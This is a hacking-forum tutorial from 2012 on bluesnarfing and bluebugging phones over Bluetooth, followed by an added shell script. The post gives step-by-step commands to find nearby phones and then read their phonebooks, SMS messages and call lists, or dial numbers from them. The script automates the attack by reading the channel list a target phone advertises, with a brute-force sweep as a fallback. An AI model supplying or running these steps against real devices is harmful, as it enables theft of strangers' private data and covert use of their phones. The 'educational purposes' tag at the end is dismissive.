TGS Forum
 [TUT] BLUETOOTH HACKING with Bluebugger and Bluesnarfer

Author: ungli (Moderator)
Points: 497 | Posts: 222 | Join date: 2011-04-05 | Age: 32

Post subject: [TUT] BLUETOOTH HACKING with Bluebugger and Bluesnarfer
Posted: Sat Jun 30, 2012 10:25 am

Low success rate so you have to keep on trying ..


Bluebugger

Bluebugging is a form of Bluetooth attack often caused by a lack of awareness. In order of discovery, Bluetooth attacks were first seen with the advent of Bluejacking, followed by Bluesnarfing and Bluebugging.

Bluebugging is best known for attacking the Nokia phones. This is simply because of them being earlier models. These phones shipped with a faulty implementation of Bluetooth, which has since been updated thanks to newer firmware (pinware authentication and/or PIN entry) available to each customer.

This newer firmware does not stop hackers from penetrating these devices. Rather, it will only slow them down for a short time period. For the average user, personal security (use and protection of one's multiple-digit PIN) and situational awareness can make this task much more difficult and force those committing Bluebugging to rely on special hardware and an enormous amount of computing power for success.

You need

BACKTRACK 4

Bluesnarfer and Bluebugger commands

Configure Bluetooth device with the following command:

bt ~ # mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0


That was for Bluesnarfer and now for bluebugger the following command:

bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0


Then type the following command:

bt ~ # hciconfig hci0 up


Now the Bluetooth adaptor should be ready. Now type the following command:

bt ~ # hciconfig hci0


You should see something like this:

hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0


For scanning other Bluetooth devices type the following command:

bt ~ # hcitool scan hci0


You should see all the devices in the area. You can also use Btscanner and Btscanner has a bruteforce scanner for discovering hidden devices.


Now note the name and MAC of the target and let's move on. First thing, let's try to ping our target. Type the following command:

l2ping (target MAC)


Next we need to find out more about the target device so we need blueprint with the following command:

sdptool browse --tree --l2cap (target MAC)


Now type the following command:

bt ~ # bluesnarfer


Now you see something like this:

bluesnarfer version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (received call list)
"XX" much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list available phonebook memory storage
-i : device info


Type the following bluesnarfer command:

bluesnarfer [options] -C 7 -b (target MAC)

bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55 (example)


Type the following Bluebugger command:

bluebugger -h


Now you should get something like this:

bluebugger 0.1
-----------------------------------------

Usage: bluebugger [OPTIONS] -a (addr) [MODE]

-a (addr) = Bluetooth address of target

Options:
--------
-m (name) = Name to use when connecting (default: '')
-d (device) = Device to use (default: '/dev/rfcomm')
-c (channel) = Channel to use (default: 17)
-n = No device name lookup
-t (timeout) = Timeout in seconds for name lookup (default: 5)
-o (file) = Write output to (file)

Mode:
-----
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial (num) = Dial number
ATCMD = Custom Command (e.g. '+GMI')

NOTE: Modes can be combined, e.g. 'info phonebook +GMI'


Now type the following command:

bluebugger [OPTIONS] -c 7 -a (target MAC) [MODE]

bluebugger -m ungli.baba -c 7 -a 00:11:22:33:44:55 dial 0845KIM (example)


And again you should see some results. If after using bluebugger you get an "operation already in progress" error, type:

hciconfig hci0 down
hciconfig hci0 reset
hciconfig hci0 up


Basic Commands:

lsusb detection of the type or device producer
hciconfig hci0 up for bluetooth device activation
hciconfig -a for detection of services about your own device
hcitool scan hci0 for ether scan
sdptool browse bd_addr fingerprint available devices


Detection of Bluetooth device:

hcitool scan


Configuration discovery and device detection:

hciconfig hci0


Every BlueTooth device has assigned a so called class. The command for finding out the class is:

hciconfig hci0 class


Change of Class device:

hciconfig hci0 class 0x0000


For hcitool or hcidump:

hcitool [options] [command parameters] or hcidump [options] [filter]

RFCOMM PORTS ARE GOLD MINES .. IF YOU PICK THE RIGHT ONES YOU WILL PROGRESS WELL.. MANY RFCOMM PORTS, MORE THAN 40... SO YOU MUST KEEP ON TRYING .. I HAVEN'T TRIED IT ON MANY PHONES SO I'M NOT SURE OF ITS SUCCESS RATE ... GOOD LUCK

FOR EDUCATIONAL PURPOSES ONLY WTF
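The post tells you to guess the RFCOMM channel (-C 7, -c 17, "more than 40 ports ... keep on trying"), but the sdptool browse step it already runs prints the channel each service listens on. The script below is an added example, not part of ungli's post and not shipped with BlueZ, bluesnarfer or bluebugger; it parses sdptool browse output into channel/service pairs and feeds them to bluesnarfer, falling back to the blind 1..N sweep only when SDP returns nothing. The SDP text embedded in it is a constructed sample in the real sdptool browse layout (the addresses, handles and channel numbers are made up), and the function names rfcomm_channels, snarf_channels and brute_channels are my own. Live use assumes a BackTrack/BlueZ box with hci0 up and sdptool and bluesnarfer on PATH; with DRY_RUN=1 it only prints the commands it would run, so it works without an adapter.

```shell
#!/bin/sh
# Added example: pick RFCOMM channels from SDP records instead of guessing.
# Constructed sample of `sdptool browse <bdaddr>` output (not captured from a real phone).
SAMPLE_SDP='Browsing 00:11:22:33:44:55 ...
Service Name: Dial-up networking
Service RecHandle: 0x10000
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100

Service Name: Headset Audio Gateway
Service RecHandle: 0x10001
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2

Service Name: OBEX Object Push
Service RecHandle: 0x10002
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)

Service Name: Serial Port
Service RecHandle: 0x10003
Service Class ID List:
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
'

# rfcomm_channels: read sdptool browse text on stdin, print "<channel>\t<service name>"
# for every service whose protocol stack contains RFCOMM, lowest channel first.
# A blank line ends an SDP record, so a record without a name never inherits one.
rfcomm_channels() {
    awk '
        /^Service Name:/        { name = substr($0, index($0, ":") + 2) }
        /"RFCOMM"/              { in_rfcomm = 1; next }
        in_rfcomm && /Channel:/ { print $2 "\t" name; in_rfcomm = 0; next }
        /^$/                    { name = ""; in_rfcomm = 0 }
    ' | sort -n
}

# snarf_channels <bdaddr>: for each advertised RFCOMM channel on stdin, run
# `bluesnarfer -i` (device info) and stop at the first channel that answers.
# DRY_RUN=1 prints the command lines instead of executing them.
snarf_channels() {
    addr="$1"
    rfcomm_channels | while IFS="$(printf '\t')" read -r chan svc; do
        if [ "${DRY_RUN:-0}" = 1 ]; then
            echo "bluesnarfer -i -C $chan -b $addr   # $svc"
        else
            bluesnarfer -i -C "$chan" -b "$addr" && break
        fi
    done
}

# brute_channels <bdaddr> [last]: the blind sweep the post recommends, for targets
# that hide their SDP records. Tries channels 1..last (default 30).
brute_channels() {
    addr="$1"; last="${2:-30}"; ch=1
    while [ "$ch" -le "$last" ]; do
        if [ "${DRY_RUN:-0}" = 1 ]; then
            echo "bluesnarfer -i -C $ch -b $addr"
        else
            bluesnarfer -i -C "$ch" -b "$addr" && break
        fi
        ch=$((ch + 1))
    done
}

# Usage: ./snarf.sh <bdaddr>   (DRY_RUN=1 ./snarf.sh <bdaddr> to only print commands)
if [ "$#" -ge 1 ]; then
    target="$1"
    found="$(sdptool browse "$target" | rfcomm_channels)"
    if [ -n "$found" ]; then
        printf '%s\n' "$found" | snarf_channels "$target"
    else
        echo "no RFCOMM services advertised by $target, sweeping channels 1-30" >&2
        brute_channels "$target" 30
    fi
fi
```

Run it against the target MAC noted from hcitool scan; the SDP path usually finds the channel in one or two connection attempts where the blind sweep needs dozens, and each failed attempt on a real phone is slow, so the parse is worth the awk. Services that advertise no name still get their channel printed, with an empty name field.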